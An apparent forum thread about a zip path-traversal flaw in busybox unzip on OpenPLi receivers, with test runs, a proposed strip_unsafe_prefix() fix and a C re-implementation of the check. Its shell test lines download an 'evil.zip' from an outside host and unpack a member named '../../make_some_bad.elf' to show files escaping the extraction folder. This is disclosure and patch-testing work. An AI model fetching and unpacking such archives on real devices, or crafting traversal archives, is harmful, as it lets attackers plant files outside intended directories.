satdreamgr-openpli 5 osmega
osmega login: root
Password:
root@osmega:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@osmega:/var/volatile/tmp#
Very important - security issue
Re: Very important - security issue #21
Posted 28 May 2017 - 19:32
Unamed: 13E Quattro - 9E Quattro on IKUSI MS-0916
Re: Very important - security issue #22
Posted 28 May 2017 - 19:46
I can confirm that.
The question is whether it's worthwhile spending time on an image that is to be retired soon, and if so, who's going to do it?
Currently in use: VU+ Duo 4K (2xFBC S2), VU+ Solo 4K (1xFBC S2), uClan Usytm 4K Pro (S2+T2), Octagon SF8008 (S2+T2), Zgemma H9.2H (S2+T2)
Due to my bad health, I will not be very active at times and may be slow to respond. I will not read the forum or PM on a regular basis.
Many answers to your question can be found in our new and improved wiki.
Re: Very important - security issue #23
Posted 28 May 2017 - 20:53
Adding function strip_unsafe_prefix(_unzip) in unzip.c should be enough.
Will check it, if nobody else comes with a fix the next days.
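The fix proposed in this post, strip_unsafe_prefix() applied to member names in unzip.c, is the check that produces the "removing leading '../../' from member names" message in the test runs quoted in this thread. The following is an added example, not busybox's or OpenPLi's own code: a stand-alone C re-implementation of that stripping behaviour as described (leading "/" and "../" are dropped, as is anything up to and including an embedded "/../"), run over a few constructed member names. The helper names and the sample names are assumptions for the demo; only the first member name ("../../make_some_bad.elf") is taken from the thread.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example (not busybox's or OpenPLi's own code): a stand-alone
 * re-implementation of the behaviour the thread attributes to
 * strip_unsafe_prefix(). Before an archive member is created, drop any
 * leading "/" and "../", and anything up to and including an embedded
 * "/../", so the member name can no longer climb out of the extraction
 * directory. The return value points into `name`; *stripped receives the
 * number of bytes removed (0 when the name was already safe).
 */
const char *strip_unsafe_prefix(const char *name, size_t *stripped)
{
    const char *cp = name;

    for (;;) {
        const char *dotdot;

        if (*cp == '/') {                   /* absolute member: "/etc/passwd" */
            cp++;
            continue;
        }
        if (strncmp(cp, "../", 3) == 0) {   /* traversal at the start */
            cp += 3;
            continue;
        }
        dotdot = strstr(cp, "/../");        /* traversal after a component */
        if (dotdot == NULL)
            break;
        cp = dotdot + 4;                    /* keep only what follows it */
    }
    if (stripped != NULL)
        *stripped = (size_t)(cp - name);
    return cp;
}

/*
 * Wrapper used by the demo (hypothetical name): applies the stripping and
 * reports what was removed, once per run, in the style of the unzip output
 * quoted in the thread.
 */
const char *sanitize_member(const char *name)
{
    static int warned = 0;
    size_t n;
    const char *safe = strip_unsafe_prefix(name, &n);

    if (n > 0 && !warned) {
        warned = 1;
        fprintf(stderr, "unzip: removing leading '%.*s' from member names\n",
                (int)n, name);
    }
    return safe;
}

int main(void)
{
    /* Constructed member names for the demo: the first is the one from the
     * thread's evil.zip, the others cover absolute and embedded traversal. */
    const char *members[] = {
        "../../make_some_bad.elf",
        "/etc/passwd",
        "plugin/../../../etc/passwd",
        "plugin/data.txt",
    };
    size_t i;

    for (i = 0; i < sizeof members / sizeof members[0]; i++)
        printf("%-30s -> %s\n", members[i], sanitize_member(members[i]));
    return 0;
}
```

Two caveats for anyone porting this check. The loop only matches "/../" with a trailing slash, so a bare ".." or a final "foo/.." component is left alone; such an entry can only name a directory, not a file, so it cannot plant a payload, but an extractor that wants to be strict should reject it outright. Name stripping also does nothing about a member that is a symbolic link pointing outside the target directory followed by a later member written through that link; that is a separate check on link members, not on names.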
Re: Very important - security issue #24
Posted 28 May 2017 - 22:00
Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?
Re: Very important - security issue #25
Re: Very important - security issue #26
Posted 29 May 2017 - 15:44
Looks logical. Evaluating it is above my paygrade, so if someone can test it before we commit it?
Tested and works!
root@xpeedc:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory

Here is the PR: https://github.com/O...e-core/pull/242
Thanks @samsamsam
Edited by athoik, 29 May 2017 - 15:44.
Re: Very important - security issue #27
Posted 29 May 2017 - 18:24
Security implications should be next to nothing anyway, any sane plugin that processes compressed files should use Python's built-in modules. The scenario as described in the article would never apply to OpenPLi anyway.
Re: Very important - security issue #28
Posted 29 May 2017 - 18:45
@MiLo
should use Python's built-in modules
Really? Are you sure that "Python's built-in modules" are not vulnerable to this?
Second, you suggest that it is better to block the main GUI thread while extracting an archive than to use the eConsole component?
I have no more questions...
Edited by samsamsam, 29 May 2017 - 18:45.